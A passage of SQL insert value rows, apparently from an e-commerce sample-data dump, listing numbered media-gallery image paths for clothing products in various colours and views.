(547, 90, '/m/j/mj08-green_main_1.jpg', 'image', 0),
(548, 90, '/m/j/mj08-blue_main_1.jpg', 'image', 0),
(549, 90, '/m/j/mj08-gray_main_1.jpg', 'image', 0),
(550, 90, '/m/j/mj08-gray_alt1_1.jpg', 'image', 0),
(551, 90, '/m/j/mj08-gray_back_1.jpg', 'image', 0),
(552, 90, '/m/j/mj08-green_main_1.jpg', 'image', 0),
(553, 90, '/m/j/mj08-blue_main_1.jpg', 'image', 0),
(554, 90, '/m/j/mj08-gray_main_1.jpg', 'image', 0),
(555, 90, '/m/j/mj08-gray_alt1_1.jpg', 'image', 0),
(556, 90, '/m/j/mj08-gray_back_1.jpg', 'image', 0),
(557, 90, '/m/j/mj08-green_main_1.jpg', 'image', 0),
(558, 90, '/m/j/mj08-blue_main_1.jpg', 'image', 0),
(559, 90, '/m/j/mj08-gray_main_1.jpg', 'image', 0),
(560, 90, '/m/j/mj08-gray_alt1_1.jpg', 'image', 0),
(561, 90, '/m/j/mj08-gray_back_1.jpg', 'image', 0),
(562, 90, '/m/j/mj08-green_main_1.jpg', 'image', 0),
(563, 90, '/m/j/mj08-blue_main_1.jpg', 'image', 0),
(564, 90, '/m/j/mj08-gray_main_1.jpg', 'image', 0),
(565, 90, '/m/j/mj08-gray_alt1_1.jpg', 'image', 0),
(566, 90, '/m/j/mj08-gray_back_1.jpg', 'image', 0),
(567, 90, '/m/j/mj08-green_main_1.jpg', 'image', 0),
(568, 90, '/m/j/mj08-gray_main_1.jpg', 'image', 0),
(569, 90, '/m/j/mj08-gray_alt1_1.jpg', 'image', 0),
(570, 90, '/m/j/mj08-gray_back_1.jpg', 'image', 0),
(571, 90, '/m/j/mj09-blue_main_1.jpg', 'image', 0),
(572, 90, '/m/j/mj09-white_main_1.jpg', 'image', 0),
(573, 90, '/m/j/mj09-yellow_main_1.jpg', 'image', 0),
(574, 90, '/m/j/mj09-yellow_alt1_1.jpg', 'image', 0),
(575, 90, '/m/j/mj09-yellow_back_1.jpg', 'image', 0),
(576, 90, '/m/j/mj09-blue_main_1.jpg', 'image', 0),
(577, 90, '/m/j/mj09-white_main_1.jpg', 'image', 0),
(578, 90, '/m/j/mj09-yellow_main_1.jpg', 'image', 0),
(579, 90, '/m/j/mj09-yellow_alt1_1.jpg', 'image', 0),
(580, 90, '/m/j/mj09-yellow_back_1.jpg', 'image', 0),
(581, 90, '/m/j/mj09-blue_main_1.jpg', 'image', 0),
(582, 90, '/m/j/mj09-white_main_1.jpg', 'image', 0),
(583, 90, '/m/j/mj09-yellow_main_1.jpg', 'image', 0),
(584, 90, '/m/j/mj09-yellow_alt1_1.jpg', 'image', 0),
(585, 90, '/m/j/mj09-yellow_back_1.jpg', 'image', 0),
(586, 90, '/m/j/mj09-blue_main_1.jpg', 'image', 0),
(587, 90, '/m/j/mj09-white_main_1.jpg', 'image', 0),
(588, 90, '/m/j/mj09-yellow_main_1.jpg', 'image', 0),
(589, 90, '/m/j/mj09-yellow_alt1_1.jpg', 'image', 0),
(590, 90, '/m/j/mj09-yellow_back_1.jpg', 'image', 0),
(591, 90, '/m/j/mj09-blue_main_2.jpg', 'image', 0),
(592, 90, '/m/j/mj09-white_main_2.jpg', 'image', 0),
(593, 90, '/m/j/mj09-yellow_main_2.jpg', 'image', 0),
(594, 90, '/m/j/mj09-yellow_alt1_2.jpg', 'image', 0),
(595, 90, '/m/j/mj09-yellow_back_2.jpg', 'image', 0),
(596, 90, '/m/j/mj09-yellow_main_2.jpg', 'image', 0),
(597, 90, '/m/j/mj09-yellow_alt1_2.jpg', 'image', 0),
(598, 90, '/m/j/mj09-yellow_back_2.jpg', 'image', 0),
(599, 90, '/m/j/mj10-black_main_1.jpg', 'image', 0),
(600, 90, '/m/j/mj10-orange_main_1.jpg', 'image', 0),
(601, 90, '/m/j/mj10-red_main_1.jpg', 'image', 0),
(602, 90, '/m/j/mj10-red_alt1_1.jpg', 'image', 0),
(603, 90, '/m/j/mj10-red_back_1.jpg', 'image', 0),
(604, 90, '/m/j/mj10-black_main_1.jpg', 'image', 0),
(605, 90, '/m/j/mj10-orange_main_1.jpg', 'image', 0),
(606, 90, '/m/j/mj10-red_main_1.jpg', 'image', 0),
(607, 90, '/m/j/mj10-red_alt1_1.jpg', 'image', 0),
(608, 90, '/m/j/mj10-red_back_1.jpg', 'image', 0),
(609, 90, '/m/j/mj10-black_main_1.jpg', 'image', 0),
(610, 90, '/m/j/mj10-orange_main_1.jpg', 'image', 0),
(611, 90, '/m/j/mj10-red_main_1.jpg', 'image', 0),
(612, 90, '/m/j/mj10-red_alt1_1.jpg', 'image', 0),
(613, 90, '/m/j/mj10-red_back_1.jpg', 'image', 0),
(614, 90, '/m/j/mj10-black_main_1.jpg', 'image', 0),
(615, 90, '/m/j/mj10-orange_main_1.jpg', 'image', 0),
(616, 90, '/m/j/mj10-red_main_1.jpg', 'image', 0),
(617, 90, '/m/j/mj10-red_alt1_1.jpg', 'image', 0),
(618, 90, '/m/j/mj10-red_back_1.jpg', 'image', 0),
(619, 90, '/m/j/mj10-black_main_1.jpg', 'image', 0),
(620, 90, '/m/j/mj10-orange_main_1.jpg', 'image', 0),
(621, 90, '/m/j/mj10-red_main_1.jpg', 'image', 0),
(622, 90, '/m/j/mj10-red_alt1_1.jpg', 'image', 0),
(623, 90, '/m/j/mj10-red_back_1.jpg', 'image', 0),
(624, 90, '/m/j/mj10-red_main_1.jpg', 'image', 0),
(625, 90, '/m/j/mj10-red_alt1_1.jpg', 'image', 0),
(626, 90, '/m/j/mj10-red_back_1.jpg', 'image', 0),
(627, 90, '/m/j/mj11-black_main_1.jpg', 'image', 0),
(628, 90, '/m/j/mj11-black_alt1_1.jpg', 'image', 0),
(629, 90, '/m/j/mj11-black_back_1.jpg', 'image', 0),
(630, 90, '/m/j/mj11-green_main_1.jpg', 'image', 0),
(631, 90, '/m/j/mj11-red_main_1.jpg', 'image', 0),
(632, 90, '/m/j/mj11-black_main_1.jpg', 'image', 0),
(633, 90, '/m/j/mj11-black_alt1_1.jpg', 'image', 0),
(634, 90, '/m/j/mj11-black_back_1.jpg', 'image', 0),
(635, 90, '/m/j/mj11-green_main_1.jpg', 'image', 0),
(636, 90, '/m/j/mj11-red_main_1.jpg', 'image', 0),
(637, 90, '/m/j/mj11-black_main_1.jpg', 'image', 0),
(638, 90, '/m/j/mj11-black_alt1_1.jpg', 'image', 0),
(639, 90, '/m/j/mj11-black_back_1.jpg', 'image', 0),
(640, 90, '/m/j/mj11-green_main_1.jpg', 'image', 0),
(641, 90, '/m/j/mj11-red_main_1.jpg', 'image', 0),
(642, 90, '/m/j/mj11-black_main_1.jpg', 'image', 0),
(643, 90, '/m/j/mj11-black_alt1_1.jpg', 'image', 0),
(644, 90, '/m/j/mj11-black_back_1.jpg', 'image', 0),
(645, 90, '/m/j/mj11-green_main_1.jpg', 'image', 0),
(646, 90, '/m/j/mj11-red_main_1.jpg', 'image', 0),
(647, 90, '/m/j/mj11-black_main_1.jpg', 'image', 0),
(648, 90, '/m/j/mj11-black_alt1_1.jpg', 'image', 0),
(649, 90, '/m/j/mj11-black_back_1.jpg', 'image', 0),
(650, 90, '/m/j/mj11-green_main_1.jpg', 'image', 0),
(651, 90, '/m/j/mj11-red_main_1.jpg', 'image', 0),
(652, 90, '/m/j/mj11-black_main_1.jpg', 'image', 0),
(653, 90, '/m/j/mj11-black_alt1_1.jpg', 'image', 0),
(654, 90, '/m/j/mj11-black_back_1.jpg', 'image', 0),
(655, 90, '/m/j/mj06-blue_main_1.jpg', 'image', 0),
(656, 90, '/m/j/mj06-blue_alt1_1.jpg', 'image', 0),
(657, 90, '/m/j/mj06-blue_back_1.jpg', 'image', 0),
(658, 90, '/m/j/mj06-green_main_1.jpg', 'image', 0),
(659, 90, '/m/j/mj06-purple_main_1.jpg', 'image', 0),
(660, 90, '/m/j/mj06-blue_main_1.jpg', 'image', 0),
(661, 90, '/m/j/mj06-blue_alt1_1.jpg', 'image', 0),
(662, 90, '/m/j/mj06-blue_back_1.jpg', 'image', 0),
(663, 90, '/m/j/mj06-green_main_1.jpg', 'image', 0),
(664, 90, '/m/j/mj06-purple_main_1.jpg', 'image', 0),
(665, 90, '/m/j/mj06-blue_main_1.jpg', 'image', 0),
(666, 90, '/m/j/mj06-blue_alt1_1.jpg', 'image', 0),
(667, 90, '/m/j/mj06-blue_back_1.jpg', 'image', 0),
(668, 90, '/m/j/mj06-green_main_1.jpg', 'image', 0),
(669, 90, '/m/j/mj06-purple_main_1.jpg', 'image', 0),
(670, 90, '/m/j/mj06-blue_main_1.jpg', 'image', 0),
(671, 90, '/m/j/mj06-blue_alt1_1.jpg', 'image', 0),
(672, 90, '/m/j/mj06-blue_back_1.jpg', 'image', 0),
(673, 90, '/m/j/mj06-green_main_1.jpg', 'image', 0),
(674, 90, '/m/j/mj06-purple_main_1.jpg', 'image', 0),
(675, 90, '/m/j/mj06-blue_main_1.jpg', 'image', 0),
(676, 90, '/m/j/mj06-blue_alt1_1.jpg', 'image', 0),
(677, 90, '/m/j/mj06-blue_back_1.jpg', 'image', 0),
(678, 90, '/m/j/mj06-green_main_1.jpg', 'image', 0),
(679, 90, '/m/j/mj06-purple_main_1.jpg', 'image', 0),
(680, 90, '/m/j/mj06-blue_main_1.jpg', 'image', 0),
(681, 90, '/m/j/mj06-blue_alt1_1.jpg', 'image', 0),
(682, 90, '/m/j/mj06-blue_back_1.jpg', 'image', 0),
(683, 90, '/m/j/mj03-black_main_1.jpg', 'image', 0),
(684, 90, '/m/j/mj03-black_alt1_1.jpg', 'image', 0),
(685, 90, '/m/j/mj03-black_back_1.jpg', 'image', 0),
(686, 90, '/m/j/mj03-green_main_1.jpg', 'image', 0),
(687, 90, '/m/j/mj03-red_main_1.jpg', 'image', 0),
(688, 90, '/m/j/mj03-black_main_1.jpg', 'image', 0),
(689, 90, '/m/j/mj03-black_alt1_1.jpg', 'image', 0),
(690, 90, '/m/j/mj03-black_back_1.jpg', 'image', 0),
(691, 90, '/m/j/mj03-green_main_1.jpg', 'image', 0),
(692, 90, '/m/j/mj03-red_main_1.jpg', 'image', 0),
(693, 90, '/m/j/mj03-black_main_1.jpg', 'image', 0),
(694, 90, '/m/j/mj03-black_alt1_1.jpg', 'image', 0),
(695, 90, '/m/j/mj03-black_back_1.jpg', 'image', 0),
(696, 90, '/m/j/mj03-green_main_1.jpg', 'image', 0),
(697, 90, '/m/j/mj03-red_main_1.jpg', 'image', 0),
(698, 90, '/m/j/mj03-black_main_1.jpg', 'image', 0),
(699, 90, '/m/j/mj03-black_alt1_1.jpg', 'image', 0),
(700, 90, '/m/j/mj03-black_back_1.jpg', 'image', 0),
(701, 90, '/m/j/mj03-green_main_1.jpg', 'image', 0),
(702, 90, '/m/j/mj03-red_main_1.jpg', 'image', 0),
(703, 90, '/m/j/mj03-black_main_1.jpg', 'image', 0),
(704, 90, '/m/j/mj03-black_alt1_1.jpg', 'image', 0),
(705, 90, '/m/j/mj03-black_back_1.jpg', 'image', 0),
(706, 90, '/m/j/mj03-green_main_1.jpg', 'image', 0),
(707, 90, '/m/j/mj03-red_main_1.jpg', 'image', 0),
(708, 90, '/m/j/mj03-black_main_1.jpg', 'image', 0),
(709, 90, '/m/j/mj03-black_alt1_1.jpg', 'image', 0),
(710, 90, '/m/j/mj03-black_back_1.jpg', 'image', 0),
(711, 90, '/m/j/mj12-black_main_1.jpg', 'image', 0),
(712, 90, '/m/j/mj12-blue_main_1.jpg', 'image', 0),
(713, 90, '/m/j/mj12-orange_main_1.jpg', 'image', 0),
(714, 90, '/m/j/mj12-orange_alt1_1.jpg', 'image', 0),
(715, 90, '/m/j/mj12-orange_back_1.jpg', 'image', 0),
(716, 90, '/m/j/mj12-black_main_1.jpg', 'image', 0),
(717, 90, '/m/j/mj12-blue_main_1.jpg', 'image', 0),
(718, 90, '/m/j/mj12-orange_main_1.jpg', 'image', 0),
(719, 90, '/m/j/mj12-orange_alt1_1.jpg', 'image', 0),
(720, 90, '/m/j/mj12-orange_back_1.jpg', 'image', 0),
(721, 90, '/m/j/mj12-black_main_1.jpg', 'image', 0),
(722, 90, '/m/j/mj12-blue_main_1.jpg', 'image', 0),
(723, 90, '/m/j/mj12-orange_main_1.jpg', 'image', 0),
(724, 90, '/m/j/mj12-orange_alt1_1.jpg', 'image', 0),
(725, 90, '/m/j/mj12-orange_back_1.jpg', 'image', 0),
(726, 90, '/m/j/mj12-black_main_1.jpg', 'image', 0),
(727, 90, '/m/j/mj12-blue_main_1.jpg', 'image', 0),
(728, 90, '/m/j/mj12-orange_main_1.jpg', 'image', 0),
(729, 90, '/m/j/mj12-orange_alt1_1.jpg', 'image', 0),
(730, 90, '/m/j/mj12-orange_back_1.jpg', 'image', 0),
(731, 90, '/m/j/mj12-black_main_1.jpg', 'image', 0),
(732, 90, '/m/j/mj12-blue_main_1.jpg', 'image', 0),
(733, 90, '/m/j/mj12-orange_main_1.jpg', 'image', 0),
(734, 90, '/m/j/mj12-orange_alt1_1.jpg', 'image', 0),
(735, 90, '/m/j/mj12-orange_back_1.jpg', 'image', 0),
(736, 90, '/m/j/mj12-orange_main_1.jpg', 'image', 0),
(737, 90, '/m/j/mj12-orange_alt1_1.jpg', 'image', 0),
(738, 90, '/m/j/mj12-orange_back_1.jpg', 'image', 0),
(739, 90, '/m/s/ms04-black_main_1.jpg', 'image', 0),
(740, 90, '/m/s/ms04-orange_main_1.jpg', 'image', 0),
(741, 90, '/m/s/ms04-orange_back_1.jpg', 'image', 0),
(742, 90, '/m/s/ms04-red_main_1.jpg', 'image', 0),
(743, 90, '/m/s/ms04-black_main_1.jpg', 'image', 0),
(744, 90, '/m/s/ms04-orange_main_1.jpg', 'image', 0),
(745, 90, '/m/s/ms04-orange_back_1.jpg', 'image', 0),
(746, 90, '/m/s/ms04-red_main_1.jpg', 'image', 0),
(747, 90, '/m/s/ms04-black_main_1.jpg', 'image', 0),
(748, 90, '/m/s/ms04-orange_main_1.jpg', 'image', 0),
(749, 90, '/m/s/ms04-orange_back_1.jpg', 'image', 0),
(750, 90, '/m/s/ms04-red_main_1.jpg', 'image', 0),
(751, 90, '/m/s/ms04-black_main_1.jpg', 'image', 0),
(752, 90, '/m/s/ms04-orange_main_1.jpg', 'image', 0),
(753, 90, '/m/s/ms04-orange_back_1.jpg', 'image', 0),
(754, 90, '/m/s/ms04-red_main_1.jpg', 'image', 0),
(755, 90, '/m/s/ms04-black_main_1.jpg', 'image', 0),
(756, 90, '/m/s/ms04-orange_main_1.jpg', 'image', 0),
(757, 90, '/m/s/ms04-orange_back_1.jpg', 'image', 0),
(758, 90, '/m/s/ms04-red_main_1.jpg', 'image', 0),
(759, 90, '/m/s/ms04-orange_main_1.jpg', 'image', 0),
(760, 90, '/m/s/ms04-orange_back_1.jpg', 'image', 0),
(761, 90, '/m/s/ms05-black_main_1.jpg', 'image', 0),
(762, 90, '/m/s/ms05-blue_main_1.jpg', 'image', 0),
(763, 90, '/m/s/ms05-blue_back_1.jpg', 'image', 0),
(764, 90, '/m/s/ms05-purple_main_1.jpg', 'image', 0),
(765, 90, '/m/s/ms05-black_main_1.jpg', 'image', 0),
(766, 90, '/m/s/ms05-blue_main_1.jpg', 'image', 0),
(767, 90, '/m/s/ms05-blue_back_1.jpg', 'image', 0),
(768, 90, '/m/s/ms05-purple_main_1.jpg', 'image', 0),
(769, 90, '/m/s/ms05-black_main_1.jpg', 'image', 0),
(770, 90, '/m/s/ms05-blue_main_1.jpg', 'image', 0),
(771, 90, '/m/s/ms05-blue_back_1.jpg', 'image', 0),
(772, 90, '/m/s/ms05-purple_main_1.jpg', 'image', 0),
(773, 90, '/m/s/ms05-black_main_1.jpg', 'image', 0),
(774, 90, '/m/s/ms05-blue_main_1.jpg', 'image', 0),
(775, 90, '/m/s/ms05-blue_back_1.jpg', 'image', 0),
(776, 90, '/m/s/ms05-purple_main_1.jpg', 'image', 0),
(777, 90, '/m/s/ms05-black_main_1.jpg', 'image', 0),
(778, 90, '/m/s/ms05-blue_main_1.jpg', 'image', 0),
(779, 90, '/m/s/ms05-blue_back_1.jpg', 'image', 0),
(780, 90, '/m/s/ms05-purple_main_1.jpg', 'image', 0),
(781, 90, '/m/s/ms05-blue_main_1.jpg', 'image', 0),
(782, 90, '/m/s/ms05-blue_back_1.jpg', 'image', 0),
(783, 90, '/m/s/ms09-black_main_1.jpg', 'image', 0),
(784, 90, '/m/s/ms09-blue_main_1.jpg', 'image', 0),
(785, 90, '/m/s/ms09-blue_alt1_1.jpg', 'image', 0),
(786, 90, '/m/s/ms09-blue_back_1.jpg', 'image', 0),
(787, 90, '/m/s/ms09-red_main_1.jpg', 'image', 0),
(788, 90, '/m/s/ms09-black_main_1.jpg', 'image', 0),
(789, 90, '/m/s/ms09-blue_main_1.jpg', 'image', 0),
(790, 90, '/m/s/ms09-blue_alt1_1.jpg', 'image', 0),
(791, 90, '/m/s/ms09-blue_back_1.jpg', 'image', 0),
(792, 90, '/m/s/ms09-red_main_1.jpg', 'image', 0),
(793, 90, '/m/s/ms09-black_main_1.jpg', 'image', 0),
(794, 90, '/m/s/ms09-blue_main_1.jpg', 'image', 0),
(795, 90, '/m/s/ms09-blue_alt1_1.jpg', 'image', 0),
(796, 90, '/m/s/ms09-blue_back_1.jpg', 'image', 0),
(797, 90, '/m/s/ms09-red_main_1.jpg', 'image', 0),
(798, 90, '/m/s/ms09-black_main_1.jpg', 'image', 0),
(799, 90, '/m/s/ms09-blue_main_1.jpg', 'image', 0),
(800, 90, '/m/s/ms09-blue_alt1_1.jpg', 'image', 0),
(801, 90, '/m/s/ms09-blue_back_1.jpg', 'image', 0),
(802, 90, '/m/s/ms09-red_main_1.jpg', 'image', 0),
(803, 90, '/m/s/ms09-black_main_1.jpg', 'image', 0),
(804, 90, '/m/s/ms09-blue_main_1.jpg', 'image', 0),
(805, 90, '/m/s/ms09-blue_alt1_1.jpg', 'image', 0),
(806, 90, '/m/s/ms09-blue_back_1.jpg', 'image', 0),
(807, 90, '/m/s/ms09-red_main_1.jpg', 'image', 0),
(808, 90, '/m/s/ms09-blue_main_1.jpg', 'image', 0),
(809, 90, '/m/s/ms09-blue_alt1_1.jpg', 'image', 0),
(810, 90, '/m/s/ms09-blue_back_1.jpg', 'image', 0),
(811, 90, '/m/s/ms11-blue_main_1.jpg', 'image', 0),
(812, 90, '/m/s/ms11-green_main_1.jpg', 'image', 0),
(813, 90, '/m/s/ms11-green_back_1.jpg', 'image', 0),
(814, 90, '/m/s/ms11-yellow_main_1.jpg', 'image', 0),
(815, 90, '/m/s/ms11-blue_main_1.jpg', 'image', 0),
(816, 90, '/m/s/ms11-green_main_1.jpg', 'image', 0),
(817, 90, '/m/s/ms11-green_back_1.jpg', 'image', 0),
(818, 90, '/m/s/ms11-yellow_main_1.jpg', 'image', 0),
(819, 90, '/m/s/ms11-blue_main_1.jpg', 'image', 0),
(820, 90, '/m/s/ms11-green_main_1.jpg', 'image', 0),
(821, 90, '/m/s/ms11-green_back_1.jpg', 'image', 0),
(822, 90, '/m/s/ms11-yellow_main_1.jpg', 'image', 0),
(823, 90, '/m/s/ms11-blue_main_1.jpg', 'image', 0),
(824, 90, '/m/s/ms11-green_main_1.jpg', 'image', 0),
(825, 90, '/m/s/ms11-green_back_1.jpg', 'image', 0),
(826, 90, '/m/s/ms11-yellow_main_1.jpg', 'image', 0),
(827, 90, '/m/s/ms11-blue_main_1.jpg', 'image', 0),
(828, 90, '/m/s/ms11-green_main_1.jpg', 'image', 0),
(829, 90, '/m/s/ms11-green_back_1.jpg', 'image', 0),
(830, 90, '/m/s/ms11-yellow_main_1.jpg', 'image', 0),
(831, 90, '/m/s/ms11-green_main_1.jpg', 'image', 0),
(832, 90, '/m/s/ms11-green_back_1.jpg', 'image', 0),
(833, 90, '/m/s/ms12-black_main_1.jpg', 'image', 0),
(834, 90, '/m/s/ms12-blue_main_1.jpg', 'image', 0),
(835, 90, '/m/s/ms12-red_main_1.jpg', 'image', 0),
(836, 90, '/m/s/ms12-red_alt1_1.jpg', 'image', 0),
(837, 90, '/m/s/ms12-red_back_1.jpg', 'image', 0),
(838, 90, '/m/s/ms12-black_main_1.jpg', 'image', 0),
(839, 90, '/m/s/ms12-blue_main_1.jpg', 'image', 0),
(840, 90, '/m/s/ms12-red_main_1.jpg', 'image', 0),
(841, 90, '/m/s/ms12-red_alt1_1.jpg', 'image', 0),
(842, 90, '/m/s/ms12-red_back_1.jpg', 'image', 0),
(843, 90, '/m/s/ms12-black_main_1.jpg', 'image', 0),
(844, 90, '/m/s/ms12-blue_main_1.jpg', 'image', 0),
(845, 90, '/m/s/ms12-red_main_1.jpg', 'image', 0),
(846, 90, '/m/s/ms12-red_alt1_1.jpg', 'image', 0),
(847, 90, '/m/s/ms12-red_back_1.jpg', 'image', 0),
(848, 90, '/m/s/ms12-black_main_1.jpg', 'image', 0),
(849, 90, '/m/s/ms12-blue_main_1.jpg', 'image', 0),
(850, 90, '/m/s/ms12-red_main_1.jpg', 'image', 0),
(851, 90, '/m/s/ms12-red_alt1_1.jpg', 'image', 0),
(852, 90, '/m/s/ms12-red_back_1.jpg', 'image', 0),
(853, 90, '/m/s/ms12-black_main_1.jpg', 'image', 0),
(854, 90, '/m/s/ms12-blue_main_1.jpg', 'image', 0),
(855, 90, '/m/s/ms12-red_main_1.jpg', 'image', 0),
(856, 90, '/m/s/ms12-red_alt1_1.jpg', 'image', 0),
(857, 90, '/m/s/ms12-red_back_1.jpg', 'image', 0),
(858, 90, '/m/s/ms12-red_main_1.jpg', 'image', 0),
(859, 90, '/m/s/ms12-red_alt1_1.jpg', 'image', 0),
(860, 90, '/m/s/ms12-red_back_1.jpg', 'image', 0),
(861, 90, '/m/s/ms03-gray_main_1.jpg', 'image', 0),
(862, 90, '/m/s/ms03-gray_alt1_1.jpg', 'image', 0),
(863, 90, '/m/s/ms03-gray_back_1.jpg', 'image', 0),
(864, 90, '/m/s/ms03-green_main_1.jpg', 'image', 0),
(865, 90, '/m/s/ms03-orange_main_1.jpg', 'image', 0),
(866, 90, '/m/s/ms03-gray_main_1.jpg', 'image', 0),
(867, 90, '/m/s/ms03-gray_alt1_1.jpg', 'image', 0),
(868, 90, '/m/s/ms03-gray_back_1.jpg', 'image', 0),
(869, 90, '/m/s/ms03-green_main_1.jpg', 'image', 0),
(870, 90, '/m/s/ms03-orange_main_1.jpg', 'image', 0),
(871, 90, '/m/s/ms03-gray_main_1.jpg', 'image', 0),
(872, 90, '/m/s/ms03-gray_alt1_1.jpg', 'image', 0),
(873, 90, '/m/s/ms03-gray_back_1.jpg', 'image', 0),
(874, 90, '/m/s/ms03-green_main_1.jpg', 'image', 0),
(875, 90, '/m/s/ms03-orange_main_1.jpg', 'image', 0),
(876, 90, '/m/s/ms03-gray_main_1.jpg', 'image', 0),
(877, 90, '/m/s/ms03-gray_alt1_1.jpg', 'image', 0),
(878, 90, '/m/s/ms03-gray_back_1.jpg', 'image', 0),
(879, 90, '/m/s/ms03-green_main_1.jpg', 'image', 0),
(880, 90, '/m/s/ms03-orange_main_1.jpg', 'image', 0),
(881, 90, '/m/s/ms03-gray_main_1.jpg', 'image', 0),
(882, 90, '/m/s/ms03-gray_alt1_1.jpg', 'image', 0),
(883, 90, '/m/s/ms03-gray_back_1.jpg', 'image', 0),
(884, 90, '/m/s/ms03-green_main_1.jpg', 'image', 0),
(885, 90, '/m/s/ms03-orange_main_1.jpg', 'image', 0),
(886, 90, '/m/s/ms03-black_main_1.jpg', 'image', 0),
(887, 90, '/m/s/ms03-black_back_1.jpg', 'image', 0),
(888, 90, '/m/s/ms06-blue_main_1.jpg', 'image', 0),
(889, 90, '/m/s/ms06-blue_alt1_1.jpg', 'image', 0),
(890, 90, '/m/s/ms06-blue_back_1.jpg', 'image', 0),
(891, 90, '/m/s/ms06-green_main_1.jpg', 'image', 0),
(892, 90, '/m/s/ms06-yellow_main_1.jpg', 'image', 0),
(893, 90, '/m/s/ms06-blue_main_1.jpg', 'image', 0),
(894, 90, '/m/s/ms06-blue_alt1_1.jpg', 'image', 0),
(895, 90, '/m/s/ms06-blue_back_1.jpg', 'image', 0),
(896, 90, '/m/s/ms06-green_main_1.jpg', 'image', 0),
(897, 90, '/m/s/ms06-yellow_main_1.jpg', 'image', 0),
(898, 90, '/m/s/ms06-blue_main_1.jpg', 'image', 0),
(899, 90, '/m/s/ms06-blue_alt1_1.jpg', 'image', 0),
(900, 90, '/m/s/ms06-blue_back_1.jpg', 'image', 0),
(901, 90, '/m/s/ms06-green_main_1.jpg', 'image', 0),
(902, 90, '/m/s/ms06-yellow_main_1.jpg', 'image', 0),
(903, 90, '/m/s/ms06-blue_main_1.jpg', 'image', 0),
(904, 90, '/m/s/ms06-blue_alt1_1.jpg', 'image', 0),
(905, 90, '/m/s/ms06-blue_back_1.jpg', 'image', 0),
(906, 90, '/m/s/ms06-green_main_1.jpg', 'image', 0),
(907, 90, '/m/s/ms06-yellow_main_1.jpg', 'image', 0),
(908, 90, '/m/s/ms06-blue_main_1.jpg', 'image', 0),
(909, 90, '/m/s/ms06-blue_alt1_1.jpg', 'image', 0),
(910, 90, '/m/s/ms06-blue_back_1.jpg', 'image', 0),
(911, 90, '/m/s/ms06-green_main_1.jpg', 'image', 0),
(912, 90, '/m/s/ms06-yellow_main_1.jpg', 'image', 0),
(913, 90, '/m/s/ms06-blue_main_1.jpg', 'image', 0),
(914, 90, '/m/s/ms06-blue_alt1_1.jpg', 'image', 0),
(915, 90, '/m/s/ms06-blue_back_1.jpg', 'image', 0),
(916, 90, '/m/s/ms01-black_main_1.jpg', 'image', 0),
(917, 90, '/m/s/ms01-brown_main_1.jpg', 'image', 0),
(918, 90, '/m/s/ms01-brown_back_1.jpg', 'image', 0),
(919, 90, '/m/s/ms01-yellow_main_1.jpg', 'image', 0),
(920, 90, '/m/s/ms01-black_main_1.jpg', 'image', 0),
(921, 90, '/m/s/ms01-brown_main_2.jpg', 'image', 0),
(922, 90, '/m/s/ms01-brown_back_2.jpg', 'image', 0),
(923, 90, '/m/s/ms01-yellow_main_2.jpg', 'image', 0),
(924, 90, '/m/s/ms01-black_main_2.jpg', 'image', 0),
(925, 90, '/m/s/ms01-brown_main_2.jpg', 'image', 0),
(926, 90, '/m/s/ms01-brown_back_2.jpg', 'image', 0),
(927, 90, '/m/s/ms01-yellow_main_2.jpg', 'image', 0),
(928, 90, '/m/s/ms01-black_main_2.jpg', 'image', 0),
(929, 90, '/m/s/ms01-brown_main_2.jpg', 'image', 0),
(930, 90, '/m/s/ms01-brown_back_2.jpg', 'image', 0),
(931, 90, '/m/s/ms01-yellow_main_2.jpg', 'image', 0),
(932, 90, '/m/s/ms01-black_main_2.jpg', 'image', 0),
(933, 90, '/m/s/ms01-brown_main_2.jpg', 'image', 0),
(934, 90, '/m/s/ms01-brown_back_2.jpg', 'image', 0),
(935, 90, '/m/s/ms01-yellow_main_2.jpg', 'image', 0),
(936, 90, '/m/s/ms01-blue_main_1.jpg', 'image', 0),
(937, 90, '/m/s/ms01-blue_back_1.jpg', 'image', 0),
(938, 90, '/m/s/ms02-black_main_1.jpg', 'image', 0),
(939, 90, '/m/s/ms02-blue_main_1.jpg', 'image', 0),
(940, 90, '/m/s/ms02-gray_main_1.jpg', 'image', 0),
(941, 90, '/m/s/ms02-gray_alt1_1.jpg', 'image', 0),
(942, 90, '/m/s/ms02-gray_back_1.jpg', 'image', 0),
(943, 90, '/m/s/ms02-black_main_1.jpg', 'image', 0),
(944, 90, '/m/s/ms02-blue_main_1.jpg', 'image', 0),
(945, 90, '/m/s/ms02-gray_main_1.jpg', 'image', 0),
(946, 90, '/m/s/ms02-gray_alt1_1.jpg', 'image', 0),
(947, 90, '/m/s/ms02-gray_back_1.jpg', 'image', 0),
(948, 90, '/m/s/ms02-black_main_1.jpg', 'image', 0),
(949, 90, '/m/s/ms02-blue_main_1.jpg', 'image', 0),
(950, 90, '/m/s/ms02-gray_main_1.jpg', 'image', 0),
(951, 90, '/m/s/ms02-gray_alt1_1.jpg', 'image', 0),
(952, 90, '/m/s/ms02-gray_back_1.jpg', 'image', 0),
(953, 90, '/m/s/ms02-black_main_1.jpg', 'image', 0),
(954, 90, '/m/s/ms02-blue_main_1.jpg', 'image', 0),
(955, 90, '/m/s/ms02-gray_main_1.jpg', 'image', 0),
(956, 90, '/m/s/ms02-gray_alt1_1.jpg', 'image', 0),
(957, 90, '/m/s/ms02-gray_back_1.jpg', 'image', 0),
(958, 90, '/m/s/ms02-black_main_1.jpg', 'image', 0),
(959, 90, '/m/s/ms02-blue_main_1.jpg', 'image', 0),
(960, 90, '/m/s/ms02-gray_main_1.jpg', 'image', 0),
(961, 90, '/m/s/ms02-gray_alt1_1.jpg', 'image', 0),
(962, 90, '/m/s/ms02-gray_back_1.jpg', 'image', 0),
(963, 90, '/m/s/ms02-gray_main_1.jpg', 'image', 0),
(964, 90, '/m/s/ms02-gray_alt1_1.jpg', 'image', 0),
(965, 90, '/m/s/ms02-gray_back_1.jpg', 'image', 0),
(966, 90, '/m/s/ms10-black_main_1.jpg', 'image', 0),
(967, 90, '/m/s/ms10-blue_main_1.jpg', 'image', 0),
(968, 90, '/m/s/ms10-blue_alt1_1.jpg', 'image', 0),
(969, 90, '/m/s/ms10-blue_back_1.jpg', 'image', 0),
(970, 90, '/m/s/ms10-red_main_1.jpg', 'image', 0),
(971, 90, '/m/s/ms10-black_main_1.jpg', 'image', 0),
(972, 90, '/m/s/ms10-blue_main_1.jpg', 'image', 0),
(973, 90, '/m/s/ms10-blue_alt1_1.jpg', 'image', 0),
(974, 90, '/m/s/ms10-blue_back_1.jpg', 'image', 0),
